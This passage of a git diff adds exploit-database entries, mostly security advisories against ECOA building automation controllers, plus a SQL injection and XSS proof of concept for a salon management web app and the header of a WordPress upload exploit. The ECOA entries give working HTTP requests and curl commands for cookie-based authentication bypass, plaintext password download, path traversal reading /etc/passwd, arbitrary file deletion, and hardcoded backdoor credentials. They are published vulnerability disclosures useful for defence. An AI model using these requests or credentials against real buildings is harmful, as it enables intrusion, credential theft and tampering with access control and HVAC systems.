+designed to provide you with the latest in the Human Machine Interface (HMI) technology,
+for completely monitoring and controlling management. It may be used singly for small and
+medium sized facilities, could be linked together via the high-speed Ethernet to other
+servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more
+sophisticated applications. The Risk-Terminator practice Web basic conception that with
+operation simply and conveniently, totally share risk and make sure of security. Even
+remote sites may be controlled and monitored through Ethernet port, which base on standard
+transferring protocol like XML, Modbus TCP/IP or BACnet or URL.
+
+#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP
+networking technologies. It incorporates an embedded web server that can deliver user-specific
+web pages to any PC or mobile terminal running internet browser software. A user with an
+appropriate security codes can made adjustment or monitor the network control unit form
+any internet access point in the world. It also provides network management, integration
+and process control functions for any existing or new building controllers and microprocessor
+based equipments or system in buildings. The management function provided by the RiskBuster
+such as trend log and alarm generation improves building controllers and microprocessor
+based equipments or system management and audit trail capabilities. The integration function
+provided by the RiskBuster allows seamless integration such as information sharing (read/write)
+between building controllers and microprocessor based equipments or system without any need
+of major upgrade or equipments replacement and allow cost saving. The process control functions
+provided by the RiskBuster allow global control action to be implemented across any building
+controllers and microprocessor based equipments or system to allow full building control. The
+RiskBuster provide a truly cost effective solution for any building automation or high level
+integration application. A truly Ethernet network compliant feature allows the RiskBuster to
+be install anywhere in the building.
+
+#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for
+Building Automate System; Environment control system; HVAC control system and other types of
+equipment. Being fully programmable it ensures complete application versatility, allowing
+specific products to be created according to customer requests. This controller is a configurable
+unitary controller based on the 32bit series microcomputer, with an on-board clock, have two
+RS-485 local bus.
+
+#4 The ECS0000160 is a Router Controller for building and industry products based on various
+microprocessors. It not only accessing information but also monitoring and controlling across
+Internet directly. The ECS0000160 can totally replace and improve a typical system that always
+has tedious panel and complex working process. An obviously benefit to our customers is that
+ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed
+to connect with singular specific operating system. It's like a whole package, which provides
+browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all
+through web-pages operating, which works base on standard transmission Internet protocol. The
+ECS0000160 provides a low industry cost. A truly friendly network interface which is simple
+and easy to apply on factory floors. It supports from serial ports with options of RS485.
+
+#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden
+installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A
+conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional,
+integral and differential (P+I+D) and dead-zone control to control accurately. The controller
+features contains the sensing system, proportional control systems, computing modules, control
+modules, alarm detection system, and so on. It mainly used in building control, plant monitoring,
+air monitoring, lighting and power control, the use of premises for buildings, factories, offices,
+conference rooms, restaurants, hotels, etc.
+
+Desc:
+The BAS controller suffers from an authentication bypass vulnerability. An unauthenticated attacker
+through cookie poisoning can bypass authentication and disclose sensitive information and circumvent
+physical access controls in smart homes and buildings and manipulate HVAC.
+
+Tested on: EMBED/1.0
+ Apache Tomcat/6.0.44
+ Apache Tomcat/6.0.18
+ Windows Server
+ MySQL Version 5.1.60
+ MySQL Version 4.0.16
+ Version 2.0.1.28 20180628
+
+
+Vulnerability discovered by Neurogenesia
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5672
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5672.php
+
+
+25.06.2021
+
+--
+
+
+Authentication Bypass
+---------------------
+
+- Authentication bypass happens by modifying the Cookie values.
+- Setting the UCLS Cookie larger or equal to 19 bypasses security controls.
+
+
+Request:
+
+GET /menu.jsp?fname=../sysuse/system01.frm&time=5 HTTP/1.1
+Host: 192.168.1.3:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Cookie: JSESSIONID=t00tw00t; UCLS=251; UID=zero; PWD=science; ROOT=FOUND; AlmCt=0
+Upgrade-Insecure-Requests: 1
+Pragma: no-cache
+Cache-Control: no-cache
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50280.txt b/exploits/hardware/webapps/50280.txt
new file mode 100644
index 000000000..f4039ea51
--- /dev/null
+++ b/exploits/hardware/webapps/50280.txt
@@ -0,0 +1,131 @@
+# Exploit Title: ECOA Building Automation System - Configuration Download Information Disclosure
+# Date: 25.06.2021
+# Exploit Author: Neurogenesia
+# Vendor Homepage: http://www.ecoa.com.tw
+
+ECOA Building Automation System Configuration Download Information Disclosure
+
+
+Vendor: ECOA Technologies Corp.
+Product web page: http://www.ecoa.com.tw
+Affected version: ECOA ECS Router Controller - ECS (FLASH)
+ ECOA RiskBuster Terminator - E6L45
+ ECOA RiskBuster System - RB 3.0.0
+ ECOA RiskBuster System - TRANE 1.0
+ ECOA Graphic Control Software
+ ECOA SmartHome II - E9246
+ ECOA RiskTerminator
+
+Summary:
+#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are
+designed to provide you with the latest in the Human Machine Interface (HMI) technology,
+for completely monitoring and controlling management. It may be used singly for small and
+medium sized facilities, could be linked together via the high-speed Ethernet to other
+servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more
+sophisticated applications. The Risk-Terminator practice Web basic conception that with
+operation simply and conveniently, totally share risk and make sure of security. Even
+remote sites may be controlled and monitored through Ethernet port, which base on standard
+transferring protocol like XML, Modbus TCP/IP or BACnet or URL.
+
+#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP
+networking technologies. It incorporates an embedded web server that can deliver user-specific
+web pages to any PC or mobile terminal running internet browser software. A user with an
+appropriate security codes can made adjustment or monitor the network control unit form
+any internet access point in the world. It also provides network management, integration
+and process control functions for any existing or new building controllers and microprocessor
+based equipments or system in buildings. The management function provided by the RiskBuster
+such as trend log and alarm generation improves building controllers and microprocessor
+based equipments or system management and audit trail capabilities. The integration function
+provided by the RiskBuster allows seamless integration such as information sharing (read/write)
+between building controllers and microprocessor based equipments or system without any need
+of major upgrade or equipments replacement and allow cost saving. The process control functions
+provided by the RiskBuster allow global control action to be implemented across any building
+controllers and microprocessor based equipments or system to allow full building control. The
+RiskBuster provide a truly cost effective solution for any building automation or high level
+integration application. A truly Ethernet network compliant feature allows the RiskBuster to
+be install anywhere in the building.
+
+#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for
+Building Automate System; Environment control system; HVAC control system and other types of
+equipment. Being fully programmable it ensures complete application versatility, allowing
+specific products to be created according to customer requests. This controller is a configurable
+unitary controller based on the 32bit series microcomputer, with an on-board clock, have two
+RS-485 local bus.
+
+#4 The ECS0000160 is a Router Controller for building and industry products based on various
+microprocessors. It not only accessing information but also monitoring and controlling across
+Internet directly. The ECS0000160 can totally replace and improve a typical system that always
+has tedious panel and complex working process. An obviously benefit to our customers is that
+ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed
+to connect with singular specific operating system. It's like a whole package, which provides
+browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all
+through web-pages operating, which works base on standard transmission Internet protocol. The
+ECS0000160 provides a low industry cost. A truly friendly network interface which is simple
+and easy to apply on factory floors. It supports from serial ports with options of RS485.
+
+#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden
+installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A
+conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional,
+integral and differential (P+I+D) and dead-zone control to control accurately. The controller
+features contains the sensing system, proportional control systems, computing modules, control
+modules, alarm detection system, and so on. It mainly used in building control, plant monitoring,
+air monitoring, lighting and power control, the use of premises for buildings, factories, offices,
+conference rooms, restaurants, hotels, etc.
+
+Desc:
+The BAS controller is vulnerable to configuration disclosure when direct object reference is made
+to the syspara.dat or images.dat files using an HTTP GET request. This will enable the attacker to
+disclose sensitive information and help her in authentication bypass, privilege escalation and full
+system access.
+
+Tested on: EMBED/1.0
+ Apache Tomcat/6.0.44
+ Apache Tomcat/6.0.18
+ Windows Server
+ MySQL Version 5.1.60
+ MySQL Version 4.0.16
+ Version 2.0.1.28 20180628
+
+
+Vulnerability discovered by Neurogenesia
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5673
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5673.php
+
+
+25.06.2021
+
+--
+
+
+Configuration / Backup Download / Privilege Escalation / Password Disclosure
+----------------------------------------------------------------------------
+
+- Unauthenticated config download reveals plain-text passwords
+
+$ curl -s -O -H 'Cookie: UCLS=19' http://192.168.1.3:8080/syspara.dat
+$ curl -s -O -H 'Cookie: UCLS=19' http://192.168.1.3:8080/images.dat
+$ strings *
+...
+...
+/opt/webpage/pwsd.bin
+/user
+user
+embed
+power
+1234
+1234
+/opt/webpage/system.bin
+Oboothr=24
+bootmin=00
+OutIDWork=Y
+language=big5
+seclanguage=Y
+ValSet=Y
+allpollTm=500
+httpusr=embed
+httppwd=power
+...
+...
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50281.txt b/exploits/hardware/webapps/50281.txt
new file mode 100644
index 000000000..d29e73c82
--- /dev/null
+++ b/exploits/hardware/webapps/50281.txt
@@ -0,0 +1,114 @@
+# Exploit Title: ECOA Building Automation System - Hidden Backdoor Accounts and backdoor() Function
+# Date: 25.06.2021
+# Exploit Author: Neurogenesia
+# Vendor Homepage: http://www.ecoa.com.tw
+
+ECOA Building Automation System Hidden Backdoor Accounts and backdoor() Function
+
+
+Vendor: ECOA Technologies Corp.
+Product web page: http://www.ecoa.com.tw
+Affected version: ECOA ECS Router Controller - ECS (FLASH)
+ ECOA RiskBuster Terminator - E6L45
+ ECOA RiskBuster System - RB 3.0.0
+ ECOA RiskBuster System - TRANE 1.0
+ ECOA Graphic Control Software
+ ECOA SmartHome II - E9246
+ ECOA RiskTerminator
+
+Summary:
+#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are
+designed to provide you with the latest in the Human Machine Interface (HMI) technology,
+for completely monitoring and controlling management. It may be used singly for small and
+medium sized facilities, could be linked together via the high-speed Ethernet to other
+servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more
+sophisticated applications. The Risk-Terminator practice Web basic conception that with
+operation simply and conveniently, totally share risk and make sure of security. Even
+remote sites may be controlled and monitored through Ethernet port, which base on standard
+transferring protocol like XML, Modbus TCP/IP or BACnet or URL.
+
+#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP
+networking technologies. It incorporates an embedded web server that can deliver user-specific
+web pages to any PC or mobile terminal running internet browser software. A user with an
+appropriate security codes can made adjustment or monitor the network control unit form
+any internet access point in the world. It also provides network management, integration
+and process control functions for any existing or new building controllers and microprocessor
+based equipments or system in buildings. The management function provided by the RiskBuster
+such as trend log and alarm generation improves building controllers and microprocessor
+based equipments or system management and audit trail capabilities. The integration function
+provided by the RiskBuster allows seamless integration such as information sharing (read/write)
+between building controllers and microprocessor based equipments or system without any need
+of major upgrade or equipments replacement and allow cost saving. The process control functions
+provided by the RiskBuster allow global control action to be implemented across any building
+controllers and microprocessor based equipments or system to allow full building control. The
+RiskBuster provide a truly cost effective solution for any building automation or high level
+integration application. A truly Ethernet network compliant feature allows the RiskBuster to
+be install anywhere in the building.
+
+#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for
+Building Automate System; Environment control system; HVAC control system and other types of
+equipment. Being fully programmable it ensures complete application versatility, allowing
+specific products to be created according to customer requests. This controller is a configurable
+unitary controller based on the 32bit series microcomputer, with an on-board clock, have two
+RS-485 local bus.
+
+#4 The ECS0000160 is a Router Controller for building and industry products based on various
+microprocessors. It not only accessing information but also monitoring and controlling across
+Internet directly. The ECS0000160 can totally replace and improve a typical system that always
+has tedious panel and complex working process. An obviously benefit to our customers is that
+ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed
+to connect with singular specific operating system. It's like a whole package, which provides
+browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all
+through web-pages operating, which works base on standard transmission Internet protocol. The
+ECS0000160 provides a low industry cost. A truly friendly network interface which is simple
+and easy to apply on factory floors. It supports from serial ports with options of RS485.
+
+#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden
+installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A
+conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional,
+integral and differential (P+I+D) and dead-zone control to control accurately. The controller
+features contains the sensing system, proportional control systems, computing modules, control
+modules, alarm detection system, and so on. It mainly used in building control, plant monitoring,
+air monitoring, lighting and power control, the use of premises for buildings, factories, offices,
+conference rooms, restaurants, hotels, etc.
+
+Desc:
+The BAS controller has hidden backdoors in several binaries that serve the web application. Any
+unauthenticated attacker can download all the resources and binaries/services that serve the controller
+and search for the 'backdoor()' function in httpser.elf as well as discover hidden credentials for
+backdoor access with full functionality of the Smart Home, Access Control and Building Automation
+System solutions.
+
+Tested on: EMBED/1.0
+ Apache Tomcat/6.0.44
+ Apache Tomcat/6.0.18
+ Windows Server
+ MySQL Version 5.1.60
+ MySQL Version 4.0.16
+ Version 2.0.1.28 20180628
+
+
+Vulnerability discovered by Neurogenesia
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5674
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5674.php
+
+
+25.06.2021
+
+--
+
+
+Backdoor Accounts / Authentication Bypass
+-----------------------------------------
+
+- Example of backdoors revealed in httpser.elf binary:
+...
+...
+ VAR2 = strstr(ARG1,"username=humexembed&password=simonamandoor");
+ if (VAR2 == (char *)0x0) {
+ VAR2 = strstr(ARG1,"username=amandoor&password=amandoor");
+...
+...
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50284.txt b/exploits/hardware/webapps/50284.txt
new file mode 100644
index 000000000..63e0244ce
--- /dev/null
+++ b/exploits/hardware/webapps/50284.txt
@@ -0,0 +1,110 @@
+# Exploit Title: ECOA Building Automation System - Remote Privilege Escalation
+# Date: 25.06.2021
+# Exploit Author: Neurogenesia
+# Vendor Homepage: http://www.ecoa.com.tw
+
+ECOA Building Automation System Remote Privilege Escalation
+
+
+Vendor: ECOA Technologies Corp.
+Product web page: http://www.ecoa.com.tw
+Affected version: ECOA ECS Router Controller - ECS (FLASH)
+ ECOA RiskBuster Terminator - E6L45
+ ECOA RiskBuster System - RB 3.0.0
+ ECOA RiskBuster System - TRANE 1.0
+ ECOA Graphic Control Software
+ ECOA SmartHome II - E9246
+ ECOA RiskTerminator
+
+Summary:
+#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are
+designed to provide you with the latest in the Human Machine Interface (HMI) technology,
+for completely monitoring and controlling management. It may be used singly for small and
+medium sized facilities, could be linked together via the high-speed Ethernet to other
+servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more
+sophisticated applications. The Risk-Terminator practice Web basic conception that with
+operation simply and conveniently, totally share risk and make sure of security. Even
+remote sites may be controlled and monitored through Ethernet port, which base on standard
+transferring protocol like XML, Modbus TCP/IP or BACnet or URL.
+
+#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP
+networking technologies. It incorporates an embedded web server that can deliver user-specific
+web pages to any PC or mobile terminal running internet browser software. A user with an
+appropriate security codes can made adjustment or monitor the network control unit form
+any internet access point in the world. It also provides network management, integration
+and process control functions for any existing or new building controllers and microprocessor
+based equipments or system in buildings. The management function provided by the RiskBuster
+such as trend log and alarm generation improves building controllers and microprocessor
+based equipments or system management and audit trail capabilities. The integration function
+provided by the RiskBuster allows seamless integration such as information sharing (read/write)
+between building controllers and microprocessor based equipments or system without any need
+of major upgrade or equipments replacement and allow cost saving. The process control functions
+provided by the RiskBuster allow global control action to be implemented across any building
+controllers and microprocessor based equipments or system to allow full building control. The
+RiskBuster provide a truly cost effective solution for any building automation or high level
+integration application. A truly Ethernet network compliant feature allows the RiskBuster to
+be install anywhere in the building.
+
+#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for
+Building Automate System; Environment control system; HVAC control system and other types of
+equipment. Being fully programmable it ensures complete application versatility, allowing
+specific products to be created according to customer requests. This controller is a configurable
+unitary controller based on the 32bit series microcomputer, with an on-board clock, have two
+RS-485 local bus.
+
+#4 The ECS0000160 is a Router Controller for building and industry products based on various
+microprocessors. It not only accessing information but also monitoring and controlling across
+Internet directly. The ECS0000160 can totally replace and improve a typical system that always
+has tedious panel and complex working process. An obviously benefit to our customers is that
+ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed
+to connect with singular specific operating system. It's like a whole package, which provides
+browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all
+through web-pages operating, which works base on standard transmission Internet protocol. The
+ECS0000160 provides a low industry cost. A truly friendly network interface which is simple
+and easy to apply on factory floors. It supports from serial ports with options of RS485.
+
+#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden
+installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A
+conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional,
+integral and differential (P+I+D) and dead-zone control to control accurately. The controller
+features contains the sensing system, proportional control systems, computing modules, control
+modules, alarm detection system, and so on. It mainly used in building control, plant monitoring,
+air monitoring, lighting and power control, the use of premises for buildings, factories, offices,
+conference rooms, restaurants, hotels, etc.
+
+Desc:
+The BAS controller is vulnerable to weak access control mechanism allowing any user to escalate
+privileges by disclosing credentials of administrative accounts in plain-text.
+
+Tested on: EMBED/1.0
+ Apache Tomcat/6.0.44
+ Apache Tomcat/6.0.18
+ Windows Server
+ MySQL Version 5.1.60
+ MySQL Version 4.0.16
+ Version 2.0.1.28 20180628
+
+
+Vulnerability discovered by Neurogenesia
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5677
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5677.php
+
+
+25.06.2021
+
+--
+
+
+Privilege Escalation
+--------------------
+
+- Any user can navigate to the User Edit page (useredt.jsp) and see the password of other users in clear-text.
+
+
+Request:
+
+$ curl -s http://192.168.1.3:8080//useredt.jsp -H "Cookie: JSESSIONID=t00tw00t; UCLS=19; UID=user; PWD=user; ROOT=FOUND; AlmCt=0" |findstr embed
+
embed
power
19
root
embed
19
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50285.txt b/exploits/hardware/webapps/50285.txt
new file mode 100644
index 000000000..63456514a
--- /dev/null
+++ b/exploits/hardware/webapps/50285.txt
@@ -0,0 +1,133 @@
+# Exploit Title: ECOA Building Automation System - Local File Disclosure
+# Date: 25.06.2021
+# Exploit Author: Neurogenesia
+# Vendor Homepage: http://www.ecoa.com.tw
+
+ECOA Building Automation System Local File Disclosure Vulnerability
+
+
+Vendor: ECOA Technologies Corp.
+Product web page: http://www.ecoa.com.tw
+Affected version: ECOA ECS Router Controller - ECS (FLASH)
+ ECOA RiskBuster Terminator - E6L45
+ ECOA RiskBuster System - RB 3.0.0
+ ECOA RiskBuster System - TRANE 1.0
+ ECOA Graphic Control Software
+ ECOA SmartHome II - E9246
+ ECOA RiskTerminator
+
+Summary:
+#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are
+designed to provide you with the latest in the Human Machine Interface (HMI) technology,
+for completely monitoring and controlling management. It may be used singly for small and
+medium sized facilities, could be linked together via the high-speed Ethernet to other
+servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more
+sophisticated applications. The Risk-Terminator practice Web basic conception that with
+operation simply and conveniently, totally share risk and make sure of security. Even
+remote sites may be controlled and monitored through Ethernet port, which base on standard
+transferring protocol like XML, Modbus TCP/IP or BACnet or URL.
+
+#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP
+networking technologies. It incorporates an embedded web server that can deliver user-specific
+web pages to any PC or mobile terminal running internet browser software. A user with an
+appropriate security codes can made adjustment or monitor the network control unit form
+any internet access point in the world. It also provides network management, integration
+and process control functions for any existing or new building controllers and microprocessor
+based equipments or system in buildings. The management function provided by the RiskBuster
+such as trend log and alarm generation improves building controllers and microprocessor
+based equipments or system management and audit trail capabilities. The integration function
+provided by the RiskBuster allows seamless integration such as information sharing (read/write)
+between building controllers and microprocessor based equipments or system without any need
+of major upgrade or equipments replacement and allow cost saving. The process control functions
+provided by the RiskBuster allow global control action to be implemented across any building
+controllers and microprocessor based equipments or system to allow full building control. The
+RiskBuster provide a truly cost effective solution for any building automation or high level
+integration application. A truly Ethernet network compliant feature allows the RiskBuster to
+be install anywhere in the building.
+
+#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for
+Building Automate System; Environment control system; HVAC control system and other types of
+equipment. Being fully programmable it ensures complete application versatility, allowing
+specific products to be created according to customer requests. This controller is a configurable
+unitary controller based on the 32bit series microcomputer, with an on-board clock, have two
+RS-485 local bus.
+
+#4 The ECS0000160 is a Router Controller for building and industry products based on various
+microprocessors. It not only accessing information but also monitoring and controlling across
+Internet directly. The ECS0000160 can totally replace and improve a typical system that always
+has tedious panel and complex working process. An obviously benefit to our customers is that
+ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed
+to connect with singular specific operating system. It's like a whole package, which provides
+browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all
+through web-pages operating, which works base on standard transmission Internet protocol. The
+ECS0000160 provides a low industry cost. A truly friendly network interface which is simple
+and easy to apply on factory floors. It supports from serial ports with options of RS485.
+
+#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden
+installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A
+conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional,
+integral and differential (P+I+D) and dead-zone control to control accurately. The controller
+features contains the sensing system, proportional control systems, computing modules, control
+modules, alarm detection system, and so on. It mainly used in building control, plant monitoring,
+air monitoring, lighting and power control, the use of premises for buildings, factories, offices,
+conference rooms, restaurants, hotels, etc.
+
+Desc:
+The BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST
+parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and
+disclose sensitive and system information.
+
+Tested on: EMBED/1.0
+ Apache Tomcat/6.0.44
+ Apache Tomcat/6.0.18
+ Windows Server
+ MySQL Version 5.1.60
+ MySQL Version 4.0.16
+ Version 2.0.1.28 20180628
+
+
+Vulnerability discovered by Neurogenesia
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5679
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php
+
+
+25.06.2021
+
+--
+
+
+Arbitrary File Disclosure
+-------------------------
+
+- Attackers can disclose any file by abusing the 'fname' POST parameter in viewlog.jsp and reveal sensitive information.
+
+
+Request:
+
+POST /viewlog.jsp HTTP/1.1
+Host: 192.168.1.3:8080
+
+yr=2021&mh=6&fname=../../../../../../../../etc/passwd
+
+
+root:x:0:0:root:/root:/bin/sh
+bin:x:1:1:bin:/bin:/sbin/nologin
+daemon:x:2:2:daemon:/sbin:/sbin/nologin
+adm:x:3:4:adm:/var/adm:/sbin/nologin
+lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+sync:x:5:0:sync:/sbin:/bin/sync
+shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
+news:x:9:13:news:/var/spool/news:
+uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
+operator:x:11:0:operator:/root:/sbin/nologin
+games:x:12:100:games:/usr/games:/sbin/nologin
+gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
+ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
+nobody:x:99:99:Nobody:/:/sbin/nologin
+...
+...
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50286.txt b/exploits/hardware/webapps/50286.txt
new file mode 100644
index 000000000..9523d81ac
--- /dev/null
+++ b/exploits/hardware/webapps/50286.txt
@@ -0,0 +1,110 @@
+# Exploit Title: ECOA Building Automation System - Arbitrary File Deletion
+# Date: 25.06.2021
+# Exploit Author: Neurogenesia
+# Vendor Homepage: http://www.ecoa.com.tw
+
+ECOA Building Automation System Arbitrary File Deletion
+
+
+Vendor: ECOA Technologies Corp.
+Product web page: http://www.ecoa.com.tw
+Affected version: ECOA ECS Router Controller - ECS (FLASH)
+ ECOA RiskBuster Terminator - E6L45
+ ECOA RiskBuster System - RB 3.0.0
+ ECOA RiskBuster System - TRANE 1.0
+ ECOA Graphic Control Software
+ ECOA SmartHome II - E9246
+ ECOA RiskTerminator
+
+Summary:
+#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are
+designed to provide you with the latest in the Human Machine Interface (HMI) technology,
+for completely monitoring and controlling management. It may be used singly for small and
+medium sized facilities, could be linked together via the high-speed Ethernet to other
+servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more
+sophisticated applications. The Risk-Terminator practice Web basic conception that with
+operation simply and conveniently, totally share risk and make sure of security. Even
+remote sites may be controlled and monitored through Ethernet port, which base on standard
+transferring protocol like XML, Modbus TCP/IP or BACnet or URL.
+
+#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP
+networking technologies. It incorporates an embedded web server that can deliver user-specific
+web pages to any PC or mobile terminal running internet browser software. A user with an
+appropriate security codes can made adjustment or monitor the network control unit form
+any internet access point in the world. It also provides network management, integration
+and process control functions for any existing or new building controllers and microprocessor
+based equipments or system in buildings. The management function provided by the RiskBuster
+such as trend log and alarm generation improves building controllers and microprocessor
+based equipments or system management and audit trail capabilities. The integration function
+provided by the RiskBuster allows seamless integration such as information sharing (read/write)
+between building controllers and microprocessor based equipments or system without any need
+of major upgrade or equipments replacement and allow cost saving. The process control functions
+provided by the RiskBuster allow global control action to be implemented across any building
+controllers and microprocessor based equipments or system to allow full building control. The
+RiskBuster provide a truly cost effective solution for any building automation or high level
+integration application. A truly Ethernet network compliant feature allows the RiskBuster to
+be install anywhere in the building.
+
+#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for
+Building Automate System; Environment control system; HVAC control system and other types of
+equipment. Being fully programmable it ensures complete application versatility, allowing
+specific products to be created according to customer requests. This controller is a configurable
+unitary controller based on the 32bit series microcomputer, with an on-board clock, have two
+RS-485 local bus.
+
+#4 The ECS0000160 is a Router Controller for building and industry products based on various
+microprocessors. It not only accessing information but also monitoring and controlling across
+Internet directly. The ECS0000160 can totally replace and improve a typical system that always
+has tedious panel and complex working process. An obviously benefit to our customers is that
+ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed
+to connect with singular specific operating system. It's like a whole package, which provides
+browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all
+through web-pages operating, which works base on standard transmission Internet protocol. The
+ECS0000160 provides a low industry cost. A truly friendly network interface which is simple
+and easy to apply on factory floors. It supports from serial ports with options of RS485.
+
+#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden
+installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A
+conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional,
+integral and differential (P+I+D) and dead-zone control to control accurately. The controller
+features contains the sensing system, proportional control systems, computing modules, control
+modules, alarm detection system, and so on. It mainly used in building control, plant monitoring,
+air monitoring, lighting and power control, the use of premises for buildings, factories, offices,
+conference rooms, restaurants, hotels, etc.
+
+Desc:
+The BAS controller suffers from an arbitrary file deletion vulnerability. Using the 'cfile' GET
+parameter in fmanerdel, attackers can delete arbitrary files on the affected device and cause
+denial of service scenario.
+
+Tested on: EMBED/1.0
+ Apache Tomcat/6.0.44
+ Apache Tomcat/6.0.18
+ Windows Server
+ MySQL Version 5.1.60
+ MySQL Version 4.0.16
+ Version 2.0.1.28 20180628
+
+
+Vulnerability discovered by Neurogenesia
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5680
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5680.php
+
+
+25.06.2021
+
+--
+
+
+Arbitrary File Deletion
+-----------------------
+
+- Attacker can delete any file by abusing 'cfile' GET parameter in fmanerdel applet and using traversal sequence.
+
+
+Request:
+
+GET /fmanerdel?cfile=../secretFile.txt HTTP/1.1
\ No newline at end of file
diff --git a/exploits/php/webapps/50274.txt b/exploits/php/webapps/50274.txt
new file mode 100644
index 000000000..7cb1d5767
--- /dev/null
+++ b/exploits/php/webapps/50274.txt
@@ -0,0 +1,30 @@
+# Exploit Title: Men Salon Management System 1.0 - Multiple Vulnerabilities
+# Date: 2021-09-09
+# Exploit Author: Aryan Chehreghani
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/men-salon-management-system-using-php-and-mysql
+# Version: 1.0
+# Tested on: Windows 10 - XAMPP Server
+
+# Vulnerable page :
+http://localhost/msms/admin/edit-customer-detailed.php?editid=
+
+# Proof Of Concept :
+# 1 . Download And install [ Men Salon Management System ]
+# 2 . Go to /msms/admin/index.php and Enter Username & Password
+# 3 . Navigate to >> Customer List
+# 4 . In the action column, click Edit
+# 5 . Enter the payload into the Url and Fields
+
+# [ Sql Injection ] :
+
+Vulnerable paramater :
+The editid paramater is Vulnerable to sqli
+
+GET : http://localhost/msms/admin/edit-customer-detailed.php?editid=2'+union+select+1,database(),3,4,5,6,7,8--+
+
+# [ Stored Cross-Site Scripting ] :
+
+Vulnerable Fields : Name & Email
+
+Payload Used: ">
\ No newline at end of file
diff --git a/exploits/php/webapps/50287.py b/exploits/php/webapps/50287.py
new file mode 100755
index 000000000..b62111e76
--- /dev/null
+++ b/exploits/php/webapps/50287.py
@@ -0,0 +1,75 @@
+# Exploit Title: Wordpress Plugin Download From Files 1.48 - Arbitrary File Upload
